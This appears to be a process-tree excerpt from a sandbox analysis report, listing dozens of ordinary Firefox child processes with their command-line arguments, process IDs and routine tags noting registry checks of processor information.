C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1880 -parentBuildID 20240401114208 -prefsHandle 1796 -prefMapHandle 1784 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {afd2ce57-69d6-4f53-9f49-776f56caaea7} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" gpu4⤵PID:3240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20240401114208 -prefsHandle 2292 -prefMapHandle 2288 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fe89f8e-0296-48f3-b661-3299977c3c3b} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" socket4⤵
- Checks processor information in registry
PID:1928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3316 -childID 1 -isForBrowser -prefsHandle 3308 -prefMapHandle 3304 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a0d2054-dbe1-47c4-88d8-84c1a785b87e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2884 -childID 2 -isForBrowser -prefsHandle 3160 -prefMapHandle 3780 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {403935de-a0a6-47e8-a0fd-3f45152d96c3} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4604 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4544 -prefMapHandle 4560 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4d3647e-4605-4c3c-bbe3-640fc693468e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" utility4⤵
- Checks processor information in registry
PID:1224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 3 -isForBrowser -prefsHandle 5456 -prefMapHandle 5452 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e718cbf2-4c45-403c-9e4f-46e87e27a2bc} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5592 -childID 4 -isForBrowser -prefsHandle 5672 -prefMapHandle 5668 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19e6b156-d9d3-430e-8728-b5cf12ab7cf9} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:3668
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5860 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5788 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe395b47-0cc9-41c2-b554-c6305bcdb7f9} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:1028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3440 -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 4584 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8104f715-4272-4d77-ac18-f58e1cb50d6b} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:4512
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6056 -childID 7 -isForBrowser -prefsHandle 5752 -prefMapHandle 5788 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f86cdd07-475a-4b13-9c2b-1027160f5802} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6160 -childID 8 -isForBrowser -prefsHandle 6168 -prefMapHandle 6172 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {725d9a4e-334a-4ef2-866e-2a25b8e963cd} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6352 -childID 9 -isForBrowser -prefsHandle 6360 -prefMapHandle 6364 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69c12387-8bbb-49e1-8f46-3de0e76b5b5a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6568 -childID 10 -isForBrowser -prefsHandle 6644 -prefMapHandle 6640 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cd756ae-c694-492b-9217-471a471b1525} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6824 -childID 11 -isForBrowser -prefsHandle 6456 -prefMapHandle 6668 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4b3da98-e5d6-4a6f-a481-57e7c1c89bba} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7016 -childID 12 -isForBrowser -prefsHandle 6556 -prefMapHandle 6860 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20609154-db8d-40a8-a9a7-87724b165d77} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7120 -childID 13 -isForBrowser -prefsHandle 7128 -prefMapHandle 7132 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {982048ac-74a8-4503-a738-157e478975b1} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6540 -childID 14 -isForBrowser -prefsHandle 7340 -prefMapHandle 7344 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {037884bc-2394-47e5-84b6-af4896acbaad} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:1360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7520 -childID 15 -isForBrowser -prefsHandle 7600 -prefMapHandle 7596 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78ae56d0-01c6-4614-92c8-fb0817a7da63} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7788 -childID 16 -isForBrowser -prefsHandle 7708 -prefMapHandle 7712 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01d0f75f-96f7-4589-956b-55a6ee17f65e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7904 -childID 17 -isForBrowser -prefsHandle 7984 -prefMapHandle 7980 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d71c29e9-4e18-4cb1-8206-a01677d2916c} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8144 -childID 18 -isForBrowser -prefsHandle 7696 -prefMapHandle 7876 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9468dc0c-03c3-41b5-85cd-fe4e23db541d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8280 -childID 19 -isForBrowser -prefsHandle 8288 -prefMapHandle 8292 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {716cc7e0-231e-4b89-b35c-b4772c3bd4cd} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8480 -childID 20 -isForBrowser -prefsHandle 8488 -prefMapHandle 8492 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {643c0911-3c30-4684-ac70-a98b879eaff3} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5520
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8672 -childID 21 -isForBrowser -prefsHandle 8752 -prefMapHandle 8748 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6331d0d-d9d7-416a-af6a-893c90d9bbe8} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8880 -childID 22 -isForBrowser -prefsHandle 8956 -prefMapHandle 8952 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e16e9c8-781b-4393-a9eb-93a9f1cd9f59} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9136 -childID 23 -isForBrowser -prefsHandle 8660 -prefMapHandle 8672 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e942085-1847-468a-a980-c3269291fe14} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9244 -childID 24 -isForBrowser -prefsHandle 9252 -prefMapHandle 9256 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95ade932-1361-42e0-a860-03c84fe7ed1d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:3828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9468 -childID 25 -isForBrowser -prefsHandle 9480 -prefMapHandle 9164 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d87e9655-a072-4160-bf84-de201b68acf1} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9636 -childID 26 -isForBrowser -prefsHandle 9640 -prefMapHandle 9644 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3f70ce7-0b89-4747-b208-b53431fabcf6} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9832 -childID 27 -isForBrowser -prefsHandle 9912 -prefMapHandle 9908 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61cc9b9f-438d-4607-aa0b-dcc9e1bba2ca} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9824 -childID 28 -isForBrowser -prefsHandle 10052 -prefMapHandle 10056 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {284c57e5-9e7b-42b0-bf93-780c8e6dc9c4} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10220 -childID 29 -isForBrowser -prefsHandle 10228 -prefMapHandle 10232 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6dc1c12b-e6bd-4ada-9143-5703f34a3383} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:1704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10488 -childID 30 -isForBrowser -prefsHandle 10408 -prefMapHandle 10412 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9ca66db-72fc-4c99-8de1-92516f4c055f} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10604 -childID 31 -isForBrowser -prefsHandle 10684 -prefMapHandle 10680 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {377d89db-32dc-474f-93db-7d851712a1f6} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:4656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10700 -childID 32 -isForBrowser -prefsHandle 10884 -prefMapHandle 10880 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b13e1038-2f6a-4b77-8078-1c80d02f0693} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:1444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10996 -childID 33 -isForBrowser -prefsHandle 11076 -prefMapHandle 11072 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d240f964-5146-464a-8f98-1f815d83244d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11180 -childID 34 -isForBrowser -prefsHandle 11184 -prefMapHandle 11188 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59d93534-8e2d-42ef-b157-58a3a090a580} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11404 -childID 35 -isForBrowser -prefsHandle 11416 -prefMapHandle 11360 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02411815-7d39-4317-8dcf-2a8159e95df3} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11596 -childID 36 -isForBrowser -prefsHandle 11608 -prefMapHandle 11552 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8114dce8-4c9a-4b68-9181-df2fda06c6d5} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:3028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11844 -childID 37 -isForBrowser -prefsHandle 11764 -prefMapHandle 11768 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8bd5dfa-7a3e-4970-9567-06488d0e246a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5856
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11996 -childID 38 -isForBrowser -prefsHandle 11740 -prefMapHandle 11744 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9204f981-c5be-46c9-a5ec-b3b38a91eeea} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12172 -childID 39 -isForBrowser -prefsHandle 12184 -prefMapHandle 12128 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dae8afdc-a677-4130-bc59-91f66665eb20} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12336 -childID 40 -isForBrowser -prefsHandle 12344 -prefMapHandle 12348 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a6b7092-136b-4d14-a2c0-dfc1a894371e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12528 -childID 41 -isForBrowser -prefsHandle 12536 -prefMapHandle 12540 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95fd28d0-95b1-4cf9-ba0c-361541d524b3} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12808 -childID 42 -isForBrowser -prefsHandle 12728 -prefMapHandle 12732 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7a83aaf-a162-4b0d-99ca-776ce26841b1} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12936 -childID 43 -isForBrowser -prefsHandle 13012 -prefMapHandle 13008 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9dc18e1-5265-4b71-ba22-44f4da9f50ab} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13132 -childID 44 -isForBrowser -prefsHandle 13140 -prefMapHandle 13144 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {602525e9-ce1a-4aa8-9288-934f7062c431} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13296 -childID 45 -isForBrowser -prefsHandle 13304 -prefMapHandle 13308 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f63938e-aed5-4c54-b038-4b0b4da74a48} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:5408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13492 -childID 46 -isForBrowser -prefsHandle 13500 -prefMapHandle 13504 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cd05aca-d839-4984-a8bb-73ae03e86e96} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:1860
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13684 -childID 47 -isForBrowser -prefsHandle 13692 -prefMapHandle 13696 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc760015-bbb8-4aa3-bb4c-ff3eb8e7b023} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:4120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13872 -childID 48 -isForBrowser -prefsHandle 13880 -prefMapHandle 13884 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {758c12fd-f50e-4689-aa0a-51a9b2b6dc8a} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:2136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14084 -childID 49 -isForBrowser -prefsHandle 14092 -prefMapHandle 14096 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c8c2ad4-6e3a-4996-96a0-0312882d5054} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:4336
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14276 -childID 50 -isForBrowser -prefsHandle 14284 -prefMapHandle 14288 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {600c102d-76cd-43ab-b87a-47a4e90ffc5f} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:4528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14452 -childID 51 -isForBrowser -prefsHandle 14460 -prefMapHandle 14464 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e07054c-a408-41ac-9120-c4b936914e81} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14644 -childID 52 -isForBrowser -prefsHandle 14652 -prefMapHandle 14656 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31dab2d1-f7c8-45c2-a726-a211ee9cd650} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=14836 -childID 53 -isForBrowser -prefsHandle 14844 -prefMapHandle 14848 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5585abf-52c2-4d14-8136-033a8c4a110d} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=15028 -childID 54 -isForBrowser -prefsHandle 15036 -prefMapHandle 15040 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c31a3c2-672c-49da-86c8-ca05bee41043} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6188
-
-
